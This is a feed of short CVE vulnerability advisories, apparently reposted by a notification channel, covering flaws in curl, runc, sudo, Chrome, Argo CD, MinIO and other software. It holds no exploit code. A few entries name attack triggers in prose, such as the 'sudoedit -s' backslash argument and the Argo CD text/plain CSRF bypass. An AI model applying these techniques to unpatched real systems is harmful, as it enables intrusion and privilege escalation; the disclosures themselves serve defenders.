🚨 CVE-2023-43616An issue was discovered in Croc through 9.6.5. A sender can cause a receiver to overwrite files during ZIP extraction.🎖@cveNotify |
|
| 2024-02-01 01:07:26 |
🚨 CVE-2023-38039When curl retrieves an HTTP response, it stores the incoming headers so thatthey can be accessed later via the libcurl headers API.However, curl did not have a limit in how many or how large headers it wouldaccept in a response, allowing a malicious server to stream an endless seriesof headers and eventually cause curl to run out of heap memory.🎖@cveNotify |
|
| 2024-02-01 01:07:25 |
🚨 CVE-2022-41352An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.🎖@cveNotify |
|
| 2024-02-01 01:07:24 |
🚨 CVE-2020-12659An issue was discovered in the Linux kernel before 5.6.7. xdp_umem_reg in net/xdp/xdp_umem.c has an out-of-bounds write (by a user with the CAP_NET_ADMIN capability) because of a lack of headroom validation.🎖@cveNotify |
|
| 2024-02-01 00:37:26 |
🚨 CVE-2023-45779In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the referenced links.🎖@cveNotify |
|
| 2024-02-01 00:07:25 |
🚨 CVE-2024-0886A vulnerability classified as problematic was found in Poikosoft EZ CD Audio Converter 8.0.7. Affected by this vulnerability is an unknown functionality of the component Activation Handler. The manipulation of the argument Key leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252037 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-01 00:07:24 |
🚨 CVE-2024-21630Zulip is an open-source team collaboration tool. A vulnerability in version 8.0 is similar to CVE-2023-32677, but applies to multi-use invitations, not single-use invitation links as in the prior CVE. Specifically, it applies when the installation has configured non-admins to be able to invite users and create multi-use invitations, and has also configured only admins to be able to invite users to streams. As in CVE-2023-32677, this does not let users invite new users to arbitrary streams, only to streams that the inviter can already see. Version 8.1 fixes this issue. As a workaround, administrators can limit sending of invitations down to users who also have the permission to add users to streams.🎖@cveNotify |
|
| 2024-01-31 23:37:32 |
🚨 CVE-2024-24571facileManager is a modular suite of web apps built with the sysadmin in mind. For the facileManager web application versions 4.5.0 and earlier, we have found that XSS was present in almost all of the input fields as there is insufficient input validation.🎖@cveNotify |
|
| 2024-01-31 23:37:25 |
🚨 CVE-2024-23656Dex is an identity service that uses OpenID Connect to drive authentication for other apps. Dex 2.37.0 serves HTTPS with insecure TLS 1.0 and TLS 1.1. `cmd/dex/serve.go` line 425 seemingly sets TLS 1.2 as minimum version, but the whole `tlsConfig` is ignored after `TLS cert reloader` was introduced in v2.37.0. Configured cipher suites are not respected either. This issue is fixed in Dex 2.38.0.🎖@cveNotify |
|
| 2024-01-31 23:37:24 |
🚨 CVE-2024-23655Tuta is an encrypted email service. Starting in version 3.118.12 and prior to version 3.119.10, an attacker is able to send a manipulated email so that the user can no longer use the app to get access to received emails. By sending a manipulated email, an attacker could put the app into an unusable state. In this case, a user can no longer access received e-mails. Since the vulnerability affects not only the app, but also the web application, a user in this case has no way to access received emails. This issue was tested with iOS and the web app, but it is possible all clients are affected. Version 3.119.10 fixes this issue.🎖@cveNotify |
|
| 2024-01-31 22:37:32 |
🚨 CVE-2024-24747MinIO is a High Performance Object Storage. When someone creates an access key, it inherits the permissions of the parent key. Not only for `s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the access-key hierarchy, the `admin` rights are denied, access keys will be able to simply override their own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z.🎖@cveNotify |
|
| 2024-01-31 22:37:26 |
🚨 CVE-2024-23653BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request. The issue has been fixed in v0.12.5 . Avoid using BuildKit frontends from untrusted sources.🎖@cveNotify |
|
| 2024-01-31 22:37:25 |
🚨 CVE-2024-23650BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit client or frontend could craft a request that could lead to BuildKit daemon crashing with a panic. The issue has been fixed in v0.12.5. As a workaround, avoid using BuildKit frontends from untrusted sources.🎖@cveNotify |
|
| 2024-01-31 22:37:24 |
🚨 CVE-2024-21626runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.🎖@cveNotify |
|
| 2024-01-31 21:37:26 |
🚨 CVE-2024-1117A vulnerability was found in openBI up to 1.0.8. It has been declared as critical. Affected by this vulnerability is the function index of the file /application/index/controller/Screen.php. The manipulation of the argument fileurl leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252475.🎖@cveNotify |
|
| 2024-01-31 21:37:25 |
🚨 CVE-2024-23646Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. The application allows users to create zip files from available files on the site. In the 1.x branch prior to version 1.3.2, parameter `selectedIds` is susceptible to SQL Injection. Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level. Version 1.3.2 contains a fix for this issue.🎖@cveNotify |
|
| 2024-01-31 21:37:24 |
🚨 CVE-2019-5736runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.🎖@cveNotify |
|
| 2024-01-31 21:07:32 |
🚨 CVE-2024-23618An arbitrary code execution vulnerability exists in Arris SURFboard SGB6950AC2 devices. An unauthenticated attacker can exploit this vulnerability to achieve code execution as root.🎖@cveNotify |
|
| 2024-01-31 21:07:25 |
🚨 CVE-2023-33757A lack of SSL certificate validation in Splicecom iPCS (iOS App) v1.3.4, iPCS2 (iOS App) v2.8 and before, and iPCS (Android App) v1.8.5 and before allows attackers to eavesdrop on communications via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-01-31 21:07:24 |
🚨 CVE-2024-23307Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow.🎖@cveNotify |
|
| 2024-01-31 20:37:32 |
🚨 CVE-2024-22154Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SNP Digital SalesKing.This issue affects SalesKing: from n/a through 1.6.15.🎖@cveNotify |
|
| 2024-01-31 20:37:26 |
🚨 CVE-2023-31037NVIDIA Bluefield 2 and Bluefield 3 DPU BMC contains a vulnerability in ipmitool, where a root user may cause code injection by a network call. A successful exploit of this vulnerability may lead to code execution on the OS.🎖@cveNotify |
|
| 2024-01-31 20:37:25 |
🚨 CVE-2024-0693A vulnerability classified as problematic was found in EFS Easy File Sharing FTP 2.0. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251479. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-31 20:07:26 |
🚨 CVE-2023-6159An issue has been discovered in GitLab CE/EE affecting all versions from 12.7 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 It was possible for an attacker to trigger a Regular Expression Denial of Service via a `Cargo.toml` containing maliciously crafted input.🎖@cveNotify |
|
| 2024-01-31 20:07:25 |
🚨 CVE-2021-42143An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. An infinite loop bug exists during the handling of a ClientHello handshake message. This bug allows remote attackers to cause a denial of service by sending a malformed ClientHello handshake message with an odd length of cipher suites, which triggers an infinite loop (consuming all resources) and a buffer over-read that can disclose sensitive information.🎖@cveNotify |
|
| 2024-01-31 20:07:24 |
🚨 CVE-2024-22424Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-31 19:37:32 |
🚨 CVE-2024-0879Authentication bypass in vector-admin allows a user to register to a vector-admin server while “domain restriction” is active, even when not owning an authorized email address.🎖@cveNotify |
|
| 2024-01-31 19:37:25 |
🚨 CVE-2020-25691A flaw was found in darkhttpd. Invalid error handling allows remote attackers to cause denial-of-service by accessing a file with a large modification date. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2024-01-31 19:37:24 |
🚨 CVE-2020-29215A Cross Site Scripting in SourceCodester Employee Management System 1.0 allows the user to execute alert messages via /Employee Management System/addemp.php on admin account.🎖@cveNotify |
|
| 2024-01-31 19:07:32 |
🚨 CVE-2024-0822An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command.🎖@cveNotify |
|
| 2024-01-31 19:07:25 |
🚨 CVE-2024-23899Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system.🎖@cveNotify |
|
| 2024-01-31 19:07:24 |
🚨 CVE-2023-35836An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. An attacker within RF range can obtain a cleartext copy of the network configuration of the device, including the Wi-Fi PSK, during device setup and reconfiguration. Upon success, the attacker is able to further infiltrate the target's Wi-Fi networks.🎖@cveNotify |
|
| 2024-01-31 18:37:33 |
🚨 CVE-2024-23903Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.🎖@cveNotify |
|
| 2024-01-31 18:37:26 |
🚨 CVE-2023-35837An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. Authentication for web interface is completed via an unauthenticated WiFi AP. The administrative password for the web interface has a default password, equal to the registration ID of the device. This same registration ID is used as the WiFi SSID name. No routine is in place to force a change to this password on first use or bring its default state to the attention of the user. Once authenticated, an attacker can reconfigure the device or upload new firmware, both of which can lead to Denial of Service, code execution, or Escalation of Privileges.🎖@cveNotify |
|
| 2024-01-31 18:37:25 |
🚨 CVE-2022-39046An issue was discovered in the GNU C Library (glibc) 2.36. When the syslog function is passed a crafted input string larger than 1024 bytes, it reads uninitialized memory from the heap and prints it to the target log file, potentially revealing a portion of the contents of the heap.🎖@cveNotify |
|
| 2024-01-31 18:37:24 |
🚨 CVE-2021-3156Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.🎖@cveNotify |
|
| 2024-01-31 18:07:25 |
🚨 CVE-2023-52356A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service.🎖@cveNotify |
|
| 2024-01-31 18:07:24 |
🚨 CVE-2024-22749GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577🎖@cveNotify |
|
| 2024-01-31 17:37:43 |
🚨 CVE-2023-3421Use after free in Media in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 17:37:42 |
🚨 CVE-2023-3217Use after free in WebXR in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 17:37:41 |
🚨 CVE-2023-3215Use after free in WebRTC in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 17:37:37 |
🚨 CVE-2023-3079Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 17:37:36 |
🚨 CVE-2023-2940Inappropriate implementation in Downloads in Google Chrome prior to 114.0.5735.90 allowed an attacker who convinced a user to install a malicious extension to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-31 17:37:35 |
🚨 CVE-2023-2939Insufficient data validation in Installer in Google Chrome on Windows prior to 114.0.5735.90 allowed a local attacker to perform privilege escalation via crafted symbolic link. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-31 17:37:32 |
🚨 CVE-2023-2938Inappropriate implementation in Picture In Picture in Google Chrome prior to 114.0.5735.90 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-31 17:37:31 |
🚨 CVE-2023-2936Type Confusion in V8 in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 17:37:30 |
🚨 CVE-2023-2934Out of bounds memory access in Mojo in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 17:37:26 |
🚨 CVE-2023-2933Use after free in PDF in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 17:37:25 |
🚨 CVE-2023-2932Use after free in PDF in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 17:07:26 |
🚨 CVE-2024-0880A vulnerability was found in Qidianbang qdbcrm 1.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/edit?id=2 of the component Password Reset. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252032. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-31 17:07:25 |
🚨 CVE-2023-42144Cleartext Transmission during initial setup in Shelly TRV 20220811-15234 v.2.1.8 allows a local attacker to obtain the Wi-Fi password.🎖@cveNotify |
|
| 2024-01-31 17:07:24 |
🚨 CVE-2023-42143Missing Integrity Check in Shelly TRV 20220811-152343/v2.1.8@5afc928c allows malicious users to create a backdoor by redirecting the device to an attacker-controlled machine which serves the manipulated firmware file. The device is updated with the manipulated firmware.🎖@cveNotify |
|
| 2024-01-31 16:37:25 |
🚨 CVE-2023-6816A flaw was found in X.Org server. Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for each logical button currently down. Buttons can be arbitrarily mapped to any value up to 255, but the X.Org Server was only allocating space for the device's particular number of buttons, leading to a heap overflow if a bigger value was used.🎖@cveNotify |
|
| 2024-01-31 16:37:24 |
🚨 CVE-2024-0553A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from the response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.🎖@cveNotify |
|
| 2024-01-31 15:37:44 |
🚨 CVE-2021-33630NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.C.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.🎖@cveNotify |
|
| 2024-01-31 15:37:43 |
🚨 CVE-2023-42890The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-31 15:37:42 |
🚨 CVE-2023-41983The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.1, Safari 17.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2024-01-31 15:37:41 |
🚨 CVE-2023-32359This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 16.7.2 and iPadOS 16.7.2. A user's password may be read aloud by VoiceOver.🎖@cveNotify |
|
| 2024-01-31 15:37:37 |
🚨 CVE-2023-41074The issue was addressed with improved checks. This issue is fixed in tvOS 17, Safari 17, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-31 15:37:36 |
🚨 CVE-2023-35074The issue was addressed with improved memory handling. This issue is fixed in tvOS 17, Safari 17, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-31 15:37:32 |
🚨 CVE-2023-41993The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2024-01-31 15:37:31 |
🚨 CVE-2020-36134AOM v2.0.1 was discovered to contain a segmentation violation via the component aom_dsp/x86/obmc_sad_avx2.c.🎖@cveNotify |
|
| 2024-01-31 15:37:30 |
🚨 CVE-2020-36131AOM v2.0.1 was discovered to contain a stack buffer overflow via the component stats/rate_hist.c.🎖@cveNotify |
|
| 2024-01-31 15:37:26 |
🚨 CVE-2020-36129AOM v2.0.1 was discovered to contain a stack buffer overflow via the component src/aom_image.c.🎖@cveNotify |
|
| 2024-01-31 15:37:25 |
🚨 CVE-2021-30473aom_image.c in libaom in AOMedia before 2021-04-07 frees memory that is not located on the heap.🎖@cveNotify |
|
| 2024-01-31 15:07:25 |
🚨 CVE-2023-52338A link following vulnerability in the Trend Micro Deep Security 20.0 and Trend Micro Cloud One - Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-31 15:07:24 |
🚨 CVE-2023-38994The 'check_univention_joinstatus' prometheus monitoring script (and other scripts) in UCS 5.0-5 revealed the LDAP plaintext password of the machine account in the process list allowing attackers with local ssh access to gain higher privileges and perform followup attacks. By default, the configuration of UCS does not allow local ssh access for regular users.🎖@cveNotify |
|
| 2024-01-31 14:37:32 |
🚨 CVE-2024-1112Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument.🎖@cveNotify |
|
| 2024-01-31 14:37:26 |
🚨 CVE-2023-6780An integer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a very long message, leading to an incorrect calculation of the buffer size to store the message, resulting in undefined behavior. This issue affects glibc 2.37 and newer.🎖@cveNotify |
|
| 2024-01-31 14:37:25 |
🚨 CVE-2023-5992A vulnerability was found in OpenSC where PKCS#1 encryption padding removal is not implemented as side-channel resistant. This issue may result in the potential leak of private data.🎖@cveNotify |
|
| 2024-01-31 14:37:24 |
🚨 CVE-2023-52337An improper access control vulnerability in Trend Micro Deep Security 20.0 and Trend Micro Cloud One - Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-31 14:07:44 |
🚨 CVE-2024-22236In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency.🎖@cveNotify |
|
| 2024-01-31 14:07:37 |
🚨 CVE-2024-0914A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key.🎖@cveNotify |
|
| 2024-01-31 14:07:36 |
🚨 CVE-2024-23745In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context.🎖@cveNotify |
|
| 2024-01-31 14:07:31 |
🚨 CVE-2024-23834Discourse is an open-source discussion platform. Improperly sanitized user input could lead to an XSS vulnerability in some situations. This vulnerability only affects Discourse instances which have disabled the default Content Security Policy. The vulnerability is patched in 3.1.5 and 3.2.0.beta5. As a workaround, ensure Content Security Policy is enabled and does not include `unsafe-inline`.🎖@cveNotify |
|
| 2024-01-31 14:07:30 |
🚨 CVE-2024-1059Use after free in Peer Connection in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-31 14:07:26 |
🚨 CVE-2023-51202OS command injection vulnerability in command processing or system call componentsROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary commands.🎖@cveNotify |
|
| 2024-01-31 14:07:25 |
🚨 CVE-2024-24567Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. Vyper compiler allows passing a value in builtin raw_call even if the call is a delegatecall or a staticcall. But in the context of delegatecall and staticcall the handling of value is not possible due to the semantics of the respective opcodes, and vyper will silently ignore the value= argument. If the semantics of the EVM are unknown to the developer, he could suspect that by specifying the `value` kwarg, exactly the given amount will be sent along to the target. This vulnerability affects 0.3.10 and earlier versions.🎖@cveNotify |
|
| 2024-01-31 12:37:30 |
🚨 CVE-2024-23507Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration.This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9.🎖@cveNotify |
|
| 2024-01-31 12:37:29 |
🚨 CVE-2024-22305Authorization Bypass Through User-Controlled Key vulnerability in ali Forms Contact Form builder with drag & drop for WordPress – Kali Forms.This issue affects Contact Form builder with drag & drop for WordPress – Kali Forms: from n/a through 2.3.36.🎖@cveNotify |
|
| 2024-01-31 12:37:26 |
🚨 CVE-2024-22290Cross-Site Request Forgery (CSRF) vulnerability in AboZain,O7abeeb,UnitOne Custom Dashboard Widgets allows Cross-Site Scripting (XSS).This issue affects Custom Dashboard Widgets: from n/a through 1.3.1.🎖@cveNotify |
|
| 2024-01-31 12:37:25 |
🚨 CVE-2024-1098A vulnerability was found in Rebuild up to 3.5.5 and classified as problematic. This issue affects the function QiniuCloud.getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to information disclosure. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252455.🎖@cveNotify |
|
| 2024-01-31 12:37:24 |
🚨 CVE-2023-6915A Null pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return.🎖@cveNotify |
|
| 2024-01-31 11:37:25 |
🚨 CVE-2023-50357A cross site scripting vulnerability in the AREAL SAS Websrv1 ASP website allows a remote low-privileged attacker to gain escalated privileges of other non-admin users.🎖@cveNotify |
|
| 2024-01-31 11:37:24 |
🚨 CVE-2023-50356SSL connections to NOVELL and Synology LDAP server are vulnerable to a man-in-the-middle attack due to improper certificate validation in AREAL Topkapi Vision (Server). This allows a remote unauthenticated attacker to gather sensitive information and prevent valid users from login.🎖@cveNotify |
|
| 2024-01-31 10:37:25 |
🚨 CVE-2021-36372In Apache Ozone versions prior to 1.2.0, Initially generated block tokens are persisted to the metadata database and can be retrieved with authenticated users with permission to the key. Authenticated users may use them even after access is revoked.🎖@cveNotify |
|
| 2024-01-31 10:37:24 |
🚨 CVE-2020-17533Apache Accumulo versions 1.5.0 through 1.10.0 and version 2.0.0 do not properly check the return value of some policy enforcement functions before permitting an authenticated user to perform certain administrative operations. Specifically, the return values of the 'canFlush' and 'canPerformSystemActions' security functions are not checked in some instances, therefore allowing an authenticated user with insufficient permissions to perform the following actions: flushing a table, shutting down Accumulo or an individual tablet server, and setting or removing system-wide Accumulo configuration properties.🎖@cveNotify |
|
| 2024-01-31 09:37:32 |
🚨 CVE-2023-44313Server-Side Request Forgery (SSRF) vulnerability in Apache ServiceComb Service-Center. Attackers can obtain sensitive server information through specially crafted requests.This issue affects Apache ServiceComb before 2.1.0(include).Users are recommended to upgrade to version 2.2.0, which fixes the issue.🎖@cveNotify |
|
| 2024-01-31 09:37:26 |
🚨 CVE-2023-44312Exposure of Sensitive Information to an Unauthorized Actor in Apache ServiceComb Service-Center.This issue affects Apache ServiceComb Service-Center before 2.1.0 (include).Users are recommended to upgrade to version 2.2.0, which fixes the issue.🎖@cveNotify |
|
| 2024-01-31 09:37:25 |
🚨 CVE-2023-6374Authentication Bypass by Capture-replay vulnerability in Mitsubishi Electric Corporation MELSEC WS Series WS0-GETH00200 all serial numbers allows a remote unauthenticated attacker to bypass authentication by capture-replay attack and illegally login to the affected module. As a result, the remote attacker who has logged in illegally may be able to disclose or tamper with the programs and parameters in the modules.🎖@cveNotify |
|
| 2024-01-31 09:37:24 |
🚨 CVE-2023-51441** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Axis allowed users with access to the admin service to perform possible SSRFThis issue affects Apache Axis: through 1.3.As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. Alternatively you could use a build of Axis with the patch from https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 applied. The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.🎖@cveNotify |
|
| 2024-01-31 08:37:26 |
🚨 CVE-2024-23775Integer Overflow vulnerability in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2, allows attackers to cause a denial of service (DoS) via mbedtls_x509_set_extension().🎖@cveNotify |
|
| 2024-01-31 08:37:25 |
🚨 CVE-2024-0836The WordPress Review & Structure Data Schema Plugin – Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews.🎖@cveNotify |
|
| 2024-01-31 08:37:24 |
🚨 CVE-2024-22545An issue was discovered in TRENDnet TEW-824DRU version 1.04b01, allows local unauthenticated attackers to execute arbitrary code via the system.ntp.server parameter in the sub_420AE0() function.🎖@cveNotify |
|
| 2024-01-31 07:37:24 |
🚨 CVE-2024-22236In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency.🎖@cveNotify |
|
| 2024-01-31 05:37:24 |
